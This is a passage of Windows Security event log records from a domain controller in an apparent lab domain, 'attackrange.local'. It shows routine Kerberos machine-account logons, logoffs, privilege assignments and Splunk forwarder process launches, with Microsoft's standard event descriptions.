ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263721
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74E0DC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263720
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74E0DC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51445
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263719
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74E0DC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:22:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263725
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x74A304
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:22:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263728
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74EE51
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:22:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263727
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74EE51
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51455
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:22:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263726
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74EE51
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:23:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263729
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263731
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263730
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263732
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263733
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1380
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263735
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263734
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x530
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263738
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7529F8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:23:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263737
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7529F8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51468
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:23:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263736
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7529F8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263746
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x752FD4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51474
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263745
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752FD4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263744
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x752F8C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263743
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752F8C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263742
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x752E9D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51473
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263741
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752E9D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263740
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x752E7B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51472
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263739
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752E7B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
